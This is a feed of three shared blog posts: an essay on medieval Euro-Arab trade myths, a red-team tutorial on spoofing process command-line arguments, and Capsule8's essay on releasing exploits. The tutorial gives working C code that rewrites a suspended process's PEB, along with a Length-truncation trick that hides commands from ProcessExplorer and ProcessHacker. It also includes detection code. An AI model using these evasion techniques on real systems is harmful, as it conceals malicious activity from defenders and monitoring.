Shared posts

17 Oct 09:06

On colonial mindsets and the myth of medieval Europe in isolation from the Muslim world

by Dr Eleanor Janega

An idea that well-meaning people with no background in medieval history often bring up to me when attempting to relate is that the medieval period was certainly a glowing time for civilization – if one is explicitly and only discussing the Arab world. This idea gets hurled at me when I am pointing out what the term Dark Ages means, or discussing the bathing habits of medieval Europeans, or just trying to have a quiet pint in peace for the love of Christ. As I say, I do think it comes from a place of wanting to correct an inaccurate and overly European historiography. People want to prove that they understand there is more to the world than one peninsula and that multiple histories are available. They want to show that they understand that non-White people are capable of innovation. They also want to show that they have learned something and are able to critique dominant historical narratives. While all of this is all very charming, it is also inaccurate, and ironically ideas like this – far from elevating Arab history – simply play into a colonialist narrative in history, but from another angle.

As regular readers of the blog will no doubt be aware, I regularly stan medieval Arabic culture. If you asked me where I would live in the medieval period I always say the Iberian peninsula, where I (as a noted lady) would have a better chance at determining my own career and indeed just partying. I have written repeatedly on the racism of ignoring Arabic luminaries like Ibn Sina, and have attempted to highlight the interconnected nature of the medieval world and the ways in which trade, both commercial and intellectual, enlivened medieval Europe. All of this is to say that I am more than aware of the fact that there was a whole hell of a lot of interesting stuff going down in the medieval Arabic world. So, I agree with statements like these to a certain point. The trouble that I have has to do with the idea of Europe as a hopeless backwater in opposition to the glories of the Arab world.

Obviously one of the major reasons I disagree with this position is that it is just flat out wrong. I should hardly need to say by now that the idea that there is an intellectual downturn in early medieval Europe (or indeed medieval Europe more broadly) is a part of a specific imperial colonialist historiography which seeks to argue that any point when Europe wasn’t violently subjugating the world around it was necessarily a bad time. To this way of thinking, when the Roman Empire goes around turning everyone into slaves and violently opposing anyone it can get its hands on, things are good, because also some amphorae are traded across the Mediterranean; but when there isn’t one giant state oppressing everyone, things are bad because fewer amphorae. This is obviously a stupid and racist position which presumes that the nice things which rich Romans enjoyed (slaves and hegemony) were available to everyone, and also requires us to just ignore the fact that slaves are people. Rome wasn’t a very nice time for the great majority of individuals, and the medieval period had plenty of nice things for the average person – you just got fooled by a later medieval advertising campaign for art and a bunch of people who wanted to do slavery in the modern period.

A Christian and a Muslim playing chess in thirteenth-century al-Andalus, from Alfonso X’s El Libro de los Juegos

Accepting the idea that Europe did suck in the medieval period is automatically ascribing to this racist and imperialist version of history. In order for a society to be good and have worthwhile things it doesn’t need to be constantly attacking other cultures and enslaving people. Look inside yourself if you think that is true.

Another reason why this falls down as an argument is also that the whole “Europe as an isolated not trading enemy in opposition to the Arab world which had nice things and was gloriously well-connected” thing is not how things happened. If, for example, we look at trade routes in the earlier medieval period as a starting point we see that is in no way the case. We do see a drop off in international shipping when the Roman Empire collapses. This is because the Empire itself used to ship goods along with moving troops in its fleets of tax-funded vessels. This existed alongside independent trading, which also moved stuff like olive oil from the Iberian peninsula or amphorae out of what is now Tunisia. Once there is no longer a state propped up by taxation doing shipping itself, shipping across the Mediterranean also slumps. That does not mean that it stops.

The Hereford Mappa Mundi, which shows the medieval conception of the Middle East (at the top) as the centre of the world.

While we see a decline in movement, the key here is that we see a decline, not a total cessation. Movement very much continued throughout the early medieval period, and we have ample potsherd-based evidence to back that up. Yes, certainly many people shifted to making their own pottery, but rich people could still get their hands on the good stuff if they wanted to.

You know when European shipping in the Mediterranean really slowed down? After the Muslim conquests. Where there had been a lively shipping economy suddenly there were a bunch of real bad ass guys who had carte blanche to intercept the ship of any infidel they could find. Oh and if you could take some of their land while you were at it, that would be great. Most famously, the Umayyad conquest of Hispania went really well, felling the Visigothic kingdom on the Iberian Peninsula and turning all those olive orchards over to Muslim rule. In quick succession, you then see the establishment of the Emirate of Ifriqiya on the North-African coast, as well as the Emirate of Sicily on, well, Sicily. In other words, a lot of the Western Mediterranean just wasn’t Christian any longer, so it’s kinda weird to blame Europeans for not maintaining trade routes there. You can’t simultaneously demand that Europeans trade more with the Muslim world while ignoring the fact that the Muslim world was also a part of Europe, and very much interested in dominating any extant trade routes.[1]

This narrative also completely ignores the fact that there was thriving trade which existed all through this period.[2] We have plenty of records on port tolls and taxes which tell the story of luxury goods crisscrossing the continent and across the Mediterranean, regardless of who was doing what.[3] Walrus ivory and amber from the Baltic coast ends up at the Eastern Roman court in Constantinople. Furs, honey, and elephant ivory popped up basically anywhere anyone had the gold to trade for it. Oh and gold, which largely came from Africa, was around the shop too. Indonesian spices like pepper and nutmeg featured happily in European cuisines, and lapis lazuli from Afghanistan was being ground into ultramarine. You want luxury goods? They were there, because trade was still happening. It just wasn’t happening on an imperial scale – an undertaking which I will again remind you takes a whole lot of slaves to maintain. The idea that Europeans were an unwashed and unrefined mass in opposition to the glories of life in the Arabic world just doesn’t hold up to scrutiny.

A medieval European grocer selling spices, Amb. 317.2° Folio 75 recto 

The backward post-Roman Europe versus glories of the East narrative also very helpfully ignores the fact that one of the glories of the East was the still extant Eastern Rome – with its aforementioned capital in Constantinople. (You may also know it as Byzantium, but we are trying to be precise here.) Of course, Eastern Rome was one of the big losers in the whole Muslim conquests thing, losing its extremely valuable territory in Egypt, which accounted for a huge amount of its tax revenue. It also very famously lost the near east more generally. Having said all that, it was still a major maritime power, owning territory on the Italian Peninsula in what is now Calabria and Apulia. Constantinople was still very much about that Roman life in the medieval period, with a keen popular interest in chariot racing, a lively trade with the near East and Western Christendom, and even what could be seen as a sort of pre-modern welfare state, ensuring that its citizens in cities always had enough grain to eat. If we want to pretend that everything was bad and gloomy in medieval Europe compared to the Arab world because Rome collapsed, how then do we account for the fact that it was actually still going at that time, and trading just fine?

Obviously then, narratives of trade stopping totally in medieval Europe are incorrect and overwrought, but why would I say that buying into them supports a colonialist narrative? The answer is that saying Europe didn’t have anything nice, as opposed to a flourishing Arab world, is a way of justifying the violent incursions on the part of Europeans into the Middle East.

The Court of King Alphonso X “The Wise”. His scriptorium was one of the most important places for copying Arabic texts into Latin and then disseminating them throughout Europe.

These arguments usually hinge on the idea that before the Crusades, Europe was a disgusting place full of people who didn’t bathe, with nothing but unsalted porridge to eat. All of that changes, in theory, with increased contact with the Middle East through the establishment of the Crusader States there. The theory goes that it wasn’t until Europeans were able to carve their own ports out along the coast of the Levant that anything nice got into Europe at all. Without Europeans at Jaffa, there would be no spices, oranges, or rice in Europe. Hell, without all that religious violence maybe Europeans never would have anything nice ever!

That is not only factually incorrect, but it is a way of justifying what amounted to centuries of attempts to violently subjugate the Holy Land. Sure, all that violence was unseemly – but access to the Silk Road! It also amounts to a convenient justification for modern imperial and colonial violence. Well Europe was a terrible hell hole! What choice did they have other than to sail around the globe, enslave huge swathes of people, do a spot of genocide and begin to extract all possible value from any native people! After all, everything they had before they started in on the colonising in earnest was bad.

None of this is either historically correct, or acceptable.

We can, and should, point out the major advancements that Muslim society presented to the world. There is absolutely no doubt that there was a tonne of interesting stuff going on in the near East, and I in no way dispute that assertion. What is incorrect is the idea that medieval Europe was cut off from that brilliance, a backward hole where there was no trade, no spices, no intellectual culture. Europe and South Western Asia have always been connected, and indeed the term “Arabic World” very much includes huge swathes of Europe at various points during the medieval period. If you want to say medieval Europe is a sad foil to the Muslim kingdoms, how do you account for the several European Caliphates? If you want to say that without the Roman Empire Europe lost everything bright and worthwhile, how do you explain the still up and running Eastern Roman Empire? If you want to say that without post-Crusades trade there never would have been meaningful trade in Europe, how do you explain all the fucking trading?

Crusader envoys and two men discussing renewal of treaty between King of Jerusalem and Sultan of Egypt – from Walters Ms. W.137 / Walters Art Museum.

The desire that many have to defend the medieval Arab world and its culture in the medieval period is laudable. I am in no way here to dispute that it had a lot of good stuff going on. However, pretending that all of this had nothing to do with the European world and trade, or that the only place where intellectual advancement was happening was the Arab world, is simply incorrect. The medieval world was complex, interconnected, and very much a part of an on-going scholastic tradition. To argue that without violent force Europe would have languished as a dull afterthought is to argue for imperial colonialism. Medieval Europe was a vibrant and well-connected place, and it could have continued to be so without all of the slavery and genocide. Europeans didn’t need to rape and pillage their way through the world to learn and grow. They just did it because they could.

Pro-imperialist historiography is the air that we breathe here in the decaying carcasses of the modern Imperium. I am extremely sympathetic to the urge to celebrate non-white cultures, and I spend quite a lot of time doing so myself. However, to argue that this was happening without any contact with Europe, and that Europeans cannot think or enjoy luxuries without also being involved in a violent imperial enterprise, is extremely dangerous. I know that the people who make this argument think they are being enlightened, but they are still making a pro-imperial argument when they trot out tired myths about the medieval period. We don’t undo the colonial historiography by agreeing with it. We need to write our own history which admits that every world culture has something useful and beautiful to offer us all, and that a better world can be achieved without the subjugation of others.



[1] This is a massive simplification of a fascinating subject, and trade continued notwithstanding. See D. Valérian, “The Medieval Mediterranean”, in P. Horden and S. Kinoshita (eds.), A Companion to Mediterranean History, https://doi.org/10.1002/9781118519356.ch5
[2] On post-Roman trade see Michael G. Fulford, “Byzantium and Britain: a Mediterranean perspective on Post-Roman Mediterranean Imports in Western Britain and Ireland”, Medieval Archaeology, 33:1 (1989), 1-6.
[3] See, for example, N. Middleton, “Early medieval port customs, tolls and controls on foreign trade”, Early Medieval Europe, 13 (2005), 313-358.


If you enjoyed this, please consider contributing to my patreon. If not, that is chill too!


For more on medieval Islamic advancements and culture, see:
Islam was the party religion, or, why it is lazy and essentialist to say that Islam oppresses women
On Medical Milestones, Being Racist, and Textbooks, Part I
On Medical Milestones, The Myth of Progress and Being Racist, Part II

For more on myths about the medieval period, see:
Plague Police roundup, or, I am tired, and you people give me no peace
How to win friends and influence people in medieval Europe on History Hit
If you are going to talk about the Dark Ages, you had better be right
JFC, calm down about the medieval Church
On Medical Milestones, Being Racist, and Textbooks, Part I
On Medical Milestones, The Myth of Progress and Being Racist, Part II
On medieval healthcare and American barbarism
I assure you, medieval people bathed.
On colonialism, imperialism, and ignoring medieval history
“I wasn’t taught medieval history so it is not important” is not a real argument, but ok
There’s no such thing as the ‘Dark Ages’, but OK
On the Concept of the Renaissance and Outkast’s Hey Ya
FUCK YEAH Genghis Khan – an emergency pubcast
On why the misuse of the word ‘medieval’ is a bad thing

13 Feb 08:51

How to Argue like Cobalt Strike

by Adam Chester

In Cobalt Strike 3.13, the argue command was introduced as a way of taking advantage of argument spoofing. I was first made aware of the concept while watching Will Burgess's awesome talk RedTeaming in the EDR Age, with Will crediting Casey Smith who presented the idea during a series of tweets.

As with anything introduced to Cobalt Strike which has the chance to improve operational security, I wanted to dig into the concept further to see just how this technique worked under the hood, and to understand just how we can leverage this in other tools developed outside of Cobalt Strike.

To start our review of how argument spoofing works, let's take a look at a popular tool that provides information on executing processes, including their arguments: ProcessHacker.

ProcessHacker Argument Display

As you will likely know, ProcessHacker is an open source tool similar to SysInternals Process Explorer, which is used by administrators and investigators to analyse running processes on Windows.

The source code to the application is available on GitHub, and after a bit of grepping, I found the code responsible for retrieving process arguments within phlib/native.c. The code looks like this:

NTSTATUS PhGetProcessPebString(
    _In_ HANDLE ProcessHandle,
    _In_ PH_PEB_OFFSET Offset,
    _Out_ PPH_STRING *String
    )
{
    ...
        PROCESS_BASIC_INFORMATION basicInfo;
        PVOID processParameters;
        UNICODE_STRING unicodeString;

        // Get the PEB address.
        if (!NT_SUCCESS(status = PhGetProcessBasicInformation(ProcessHandle, &basicInfo)))
            return status;

        // Read the address of the process parameters.
        if (!NT_SUCCESS(status = NtReadVirtualMemory(
            ProcessHandle,
            PTR_ADD_OFFSET(basicInfo.PebBaseAddress, FIELD_OFFSET(PEB, ProcessParameters)),
            &processParameters,
            sizeof(PVOID),
            NULL
            )))
            return status;
            
        // Read the string structure.
        if (!NT_SUCCESS(status = NtReadVirtualMemory(
            ProcessHandle,
            PTR_ADD_OFFSET(processParameters, offset),
            &unicodeString,
            sizeof(UNICODE_STRING),
            NULL
            )))
            return status;
            
    ...
}

Here we see a number of Win32 API calls, the first one (wrapped within PhGetProcessBasicInformation) is NtQueryInformationProcess which is passed a parameter of ProcessBasicInformation. If we review the API documentation, we see that this parameter requests the PEB (Process Environment Block) from a target process.

Once ProcessHacker has the PEB of the process, it becomes trivial for it to enumerate the arguments used. To see why, let's take a look at what makes up the Process Environment Block struct:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  PRTL_USER_PROCESS_PARAMETERS  ProcessParameters;
  PVOID                         Reserved4[3];
  PVOID                         AtlThunkSListPtr;
  PVOID                         Reserved5;
  ULONG                         Reserved6;
  PVOID                         Reserved7;
  ULONG                         Reserved8;
  ULONG                         AtlThunkSListPtr32;
  PVOID                         Reserved9[45];
  BYTE                          Reserved10[96];
  PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
  BYTE                          Reserved11[128];
  PVOID                         Reserved12[1];
  ULONG                         SessionId;
} PEB, *PPEB;

For the purposes of this post we will focus on the ProcessParameters field, which is made up of:

typedef struct _RTL_USER_PROCESS_PARAMETERS {
  BYTE           Reserved1[16];
  PVOID          Reserved2[10];
  UNICODE_STRING ImagePathName;
  UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;

And it is here that the process's command line is exposed, revealing the arguments used during the creation of the process. So now we know where to find this, how can we go about updating it with the aim of spoofing arguments?

Updating PEB CommandLine

To begin, let's spawn a process as you normally would, but suspend its execution from the start using the CREATE_SUSPENDED flag:

// si and pi are the STARTUPINFOA and PROCESS_INFORMATION structs declared earlier;
// CREATE_SUSPENDED keeps the primary thread from running until we have finished editing the PEB
CreateProcessA(
    NULL,
    "cmd.exe", 
    NULL, 
    NULL, 
    FALSE, 
    CREATE_SUSPENDED, 
    NULL, 
    "C:\\Windows\\System32\\", 
    &si, 
    &pi);

With the process spawned and in a suspended state, we now need to grab the PEB address, which can be done using the same trick as ProcessHacker, via the NtQueryInformationProcess call. As this call isn't exposed via the usual libraries, we will need to find it dynamically at runtime:

typedef NTSTATUS (*NtQueryInformationProcess)(
	IN HANDLE,
	IN PROCESSINFOCLASS,
	OUT PVOID,
	IN ULONG,
	OUT PULONG
);

PROCESS_BASIC_INFORMATION pbi;
DWORD retLen;
SIZE_T bytesRead;
NtQueryInformationProcess ntpi;

ntpi = (NtQueryInformationProcess)GetProcAddress(
    LoadLibraryA("ntdll.dll"), 
    "NtQueryInformationProcess");

ntpi(
    pi.hProcess, 
    ProcessBasicInformation, 
    &pbi, 
    sizeof(pbi), 
    &retLen);

With the address of the PEB identified, we can now extract a copy from the running process using ReadProcessMemory:

void* readProcessMemory(HANDLE process, void *address, DWORD bytes) {
	SIZE_T bytesRead;
	char *alloc;

	alloc = (char *)malloc(bytes);
	if (alloc == NULL) {
		return NULL;
	}

	if (ReadProcessMemory(process, address, alloc, bytes, &bytesRead) == 0) {
		free(alloc);
		return NULL;
	}

	return alloc;
}

...

// Read the PEB from the target process
success = ReadProcessMemory(pi.hProcess, pbi.PebBaseAddress, &pebLocal, sizeof(PEB), &bytesRead);

Now we need a copy of the ProcessParameters field which is an instance of the RTL_USER_PROCESS_PARAMETERS struct:

// Grab the ProcessParameters from PEB
parameters = (RTL_USER_PROCESS_PARAMETERS*)readProcessMemory(
	pi.hProcess, 
	pebLocal.ProcessParameters, 
	sizeof(RTL_USER_PROCESS_PARAMETERS)
);

Contained within the RTL_USER_PROCESS_PARAMETERS struct is the CommandLine field we are looking for, which is actually an instance of a UNICODE_STRING struct. This means that we can update the arguments by writing to the UNICODE_STRING.Buffer address using WriteProcessMemory:

// Set the actual arguments we are looking to use.
// writeProcessMemory is a thin wrapper around WriteProcessMemory, in the same
// style as readProcessMemory above; 30 bytes covers the UTF-16 string plus its NUL.
success = writeProcessMemory(
    pi.hProcess, 
    parameters->CommandLine.Buffer, 
    (void*)L"cmd.exe /k dir\0", 
    30);

And finally, we resume execution with ResumeThread. Once the thread is resumed, we find that our process will execute and parse our injected arguments as though they were passed during the CreateProcess call.

Argument Spoofing Impact

Now that we have a way to update command line arguments at runtime, what impact does this have on tools recording execution activity? Well, first let's look at SysMon. Here we can see the results after spoofing our arguments with a simple "cmd.exe /k echo Argument Spoofing Test":


Next let's take a look at ProcessExplorer:


One interesting thing called out during Raffael's introduction to "Argue" (available here if you haven't seen it) is that tools like ProcessExplorer actually retrieve a copy of the PEB each time the process is inspected, meaning that the real arguments we wrote into the PEB are revealed as soon as someone looks.

Spoofing Arguments to Process(Explorer|Hacker)

This was bugging me a bit, as there must be a way to avoid ProcessExplorer and similar tools if we have control over the PEB. It turns out that there is a weird trick that does work with both ProcessHacker and ProcessExplorer and allows you to hide your arguments... by simply creating a corrupted UNICODE_STRING.

As we know, the CommandLine field of _RTL_USER_PROCESS_PARAMETERS is a UNICODE_STRING structure. This has the following layout:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

We know that when we copy our true arguments to the Buffer parameter address, the application uses this when attempting to parse parameters, but what happens if we set the Length parameter to be less than the size of the string set within the Buffer?

Well, what we find is that ProcessHacker and ProcessExplorer each terminate the displayed string after Length bytes, whereas the actual process will continue to use Buffer until it hits a NULL character. For example, here we have a process running with the command line cmd.exe /k echo Argument Spoofing. If we update the Length of the CommandLine field to 14, we see that ProcessExplorer is showing only cmd.exe as the command line:


Similarly with ProcessHacker: we are clearly running cmd.exe with an argument, but due to the undersized Length field, the remainder of the command line is hidden:


Obviously this allows us to have a bit of fun, adding parameters such as echo Something && [Hidden command] which will be truncated, hiding our true intentions:


I've not yet tested this across multiple applications, but it seems that both cmd.exe and powershell.exe have this same behaviour. If you know why this inconsistency exists, please let me know.
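The two inconsistencies described above are also the two things a defender can check for: a creation-time record of the command line (what SysMon logged) that disagrees with what the live PEB now says, and a CommandLine whose Length field covers less than the NUL-terminated text in its Buffer. The following is an added example, not code from the original post or from Cobalt Strike. It reproduces both checks over a constructed copy of the UNICODE_STRING header and buffer bytes; on Windows those bytes would be obtained with NtQueryInformationProcess and ReadProcessMemory exactly as shown earlier, but here they are built inline so the logic can be compiled and run anywhere. The struct and function names (`inspect_commandline`, `run_sample`), the placeholder Buffer address, and the sample strings are assumptions made for the example.

```c
/*
 * Added example (not from the original post): offline checks for the two
 * command-line tells described in the text.
 *   1. Creation-time record (e.g. SysMon) != current PEB buffer => rewritten.
 *   2. UNICODE_STRING.Length < NUL-terminated length of Buffer => truncated view.
 * Assumption: header and buffer bytes are copies read from the target process;
 * here they are constructed inline.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 64-bit UNICODE_STRING layout. Length/MaximumLength are byte counts of
 * UTF-16 units; Buffer is a remote pointer and is never dereferenced here. */
struct unicode_string_hdr {
    uint16_t Length;
    uint16_t MaximumLength;
    uint16_t pad[2];
    uint64_t Buffer;
};

struct cmdline_check {
    size_t displayed_chars;     /* characters a Length-honouring viewer shows   */
    size_t parsed_chars;        /* characters the process itself parses (to NUL) */
    int length_undersized;      /* Length covers less than the NUL-terminated text */
    int rewritten_after_start;  /* current buffer differs from creation-time record */
};

/* Widen ASCII to UTF-16 units (used only to construct sample input). */
static size_t ascii_to_u16(const char *s, uint16_t *out, size_t cap)
{
    size_t n = 0;
    while (s[n] != '\0' && n + 1 < cap) {
        out[n] = (uint16_t)(unsigned char)s[n];
        n++;
    }
    out[n] = 0;
    return n;
}

/* UTF-16 units before the first NUL, or buf_units if no NUL was read. */
static size_t u16_len(const uint16_t *buf, size_t buf_units)
{
    size_t n = 0;
    while (n < buf_units && buf[n] != 0)
        n++;
    return n;
}

/* hdr: copied UNICODE_STRING; buf: buf_units units copied from hdr->Buffer;
 * creation: NUL-terminated UTF-16 command line logged at CreateProcess time
 * (may be NULL if no such record exists). Returns 0, or -1 on malformed input. */
int inspect_commandline(const struct unicode_string_hdr *hdr,
                        const uint16_t *buf, size_t buf_units,
                        const uint16_t *creation, size_t creation_units,
                        struct cmdline_check *out)
{
    if (hdr == NULL || buf == NULL || out == NULL)
        return -1;
    /* Length is a byte count; an odd value cannot describe UTF-16 text. */
    if (hdr->Length % 2 != 0 || hdr->Length > hdr->MaximumLength)
        return -1;

    size_t shown = hdr->Length / 2;
    if (shown > buf_units)
        shown = buf_units;              /* a viewer cannot show more than it read */
    size_t parsed = u16_len(buf, buf_units);

    out->displayed_chars = shown;
    out->parsed_chars = parsed;
    out->length_undersized = (shown < parsed) ? 1 : 0;

    int differs = 0;
    if (creation != NULL) {
        size_t cl = u16_len(creation, creation_units);
        differs = (cl != parsed) ||
                  memcmp(creation, buf, parsed * sizeof(uint16_t)) != 0;
    }
    out->rewritten_after_start = differs ? 1 : 0;
    return 0;
}

/* Construct a memory image from ASCII strings and run the check.
 * length_bytes plays the role of the Length field found in the remote struct. */
int run_sample(const char *creation_ascii, const char *current_ascii,
               uint16_t length_bytes, struct cmdline_check *out)
{
    uint16_t creation[256], current[256];
    size_t creation_n = ascii_to_u16(creation_ascii, creation, 256);
    size_t current_n = ascii_to_u16(current_ascii, current, 256);

    struct unicode_string_hdr hdr;
    memset(&hdr, 0, sizeof(hdr));
    hdr.Length = length_bytes;
    hdr.MaximumLength = (uint16_t)((current_n + 1) * 2);
    hdr.Buffer = 0x7ff6c0de0000ULL;     /* placeholder remote address (constructed) */

    /* A real reader would copy MaximumLength bytes starting at hdr.Buffer. */
    return inspect_commandline(&hdr, current, current_n + 1,
                               creation, creation_n + 1, out);
}

int main(void)
{
    struct cmdline_check r;
    /* Sample from the post: Length 14 hides everything after "cmd.exe". */
    if (run_sample("cmd.exe /k echo Argument Spoofing",
                   "cmd.exe /k echo Argument Spoofing", 14, &r) == 0)
        printf("shown=%zu parsed=%zu undersized=%d rewritten=%d\n",
               r.displayed_chars, r.parsed_chars,
               r.length_undersized, r.rewritten_after_start);
    return 0;
}
```

A scanner built on this would read MaximumLength bytes from the remote Buffer and treat either flag as worth a second look: `length_undersized` is the truncation trick, and `rewritten_after_start` is the ordinary argue case where the process-creation log and the live PEB no longer agree. A buffer with no NUL inside MaximumLength is a third anomaly in its own right, since a well-formed command line is always terminated.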

The source code for performing argument spoofing can be found below, or on Github here.

05 Feb 08:47

Capsule8’s Stance on Publication and Vulnerability Disclosure

by Capsule8

Last week, Capsule8 Labs released an exploit for the problems in systemd that Qualys identified on January 9th, as part of a series analyzing the vulnerabilities CVE-2018-16865 and CVE-2018-16866. We were asked why we would “weaponize” the exploits and if it would arm those looking to do harm. We have decided to expand on our reasoning, as it’s core to a lot of what we do here at Capsule8.

Today’s “responsible” disclosure practices do harm to end customers. Disclosure’s primary place is to be a tool to ensure vendors behave responsibly to problems in their code. It’s understandable that people want to use it to market themselves and their companies, and that’s okay too, but if vendors are behaving responsibly, then people need to be patient.

As long as vendors are acting responsibly and taking reasonable actions to fix their issues, everyone should refrain from disclosure until patches are available. The goal of the security industry should be to protect people and data, and premature disclosure in the face of a responsible vendor puts those things at risk.

Eventual disclosure is important so that people continually are reminded of the problem and the need to keep up to date with patches. But the industry should give users a reasonable time to patch before disclosure, instead of trying to maximize the marketing impact by talking about the bug at the same time as a patch. While 30 days is a reasonable amount of time in between upgrades, 30 seconds is not.

But whenever disclosure happens, it is incredibly important to have access to a working exploit. This systemd bug is a perfect example. Even though Qualys did not provide an exploit (citing the fact that, at the time, there was not yet a patch), it’s fairly easy for anyone with the right level of skill set to take the information they gave and produce a working exploit. Once the information is out there, the lack of an exploit is not going to be a significant hurdle for talented threat actors, who have good economic motivation to create their own exploit.

However, not having the exploit makes life harder on defenders. At Capsule8 we test our products against relevant exploits, as it helps us make sure our customers are likely to be protected against similar exploits. If this reveals any gaps, it pushes us to jump on them quickly. If we can’t test, we have to make a tough call on priorities and whether to build our own exploit to do our own testing. We hope other security vendors do the same.

End-users should be able to do the same. Defenders should have easy access to exploits in the same way attackers do, if only to test the products they use and the controls they have in place.

In short, disclosing without releasing an exploit doesn’t provide a significant speed bump to the hackers who matter (only the script kiddies). It just makes the defender’s life much harder.

So far, we have hedged our bets a bit: we have only released an exploit that requires ASLR to be turned off (even though there’s no issue landing with the bypass). Most production Linux systems will have ASLR turned on, so the exploit won’t land. This should be a high enough bar for the kiddies, but not for the smart, motivated threat actor (this doesn’t concern us, since the bar wasn’t unobtainable for that kind of actor anyway). But the exploit is still enough for defenders to do the testing they need to do to be able to provide some assurance to their end users.

Still, it means we haven’t “weaponized” anything, but we’ve equipped people with some ability to measure their exploit detection mechanisms. Whether or not vulnerability researchers move towards giving longer windows for patching before disclosure, they should at least try to always provide an exploit that works well enough for the industry to test against.

The post Capsule8’s Stance on Publication and Vulnerability Disclosure appeared first on Capsule8.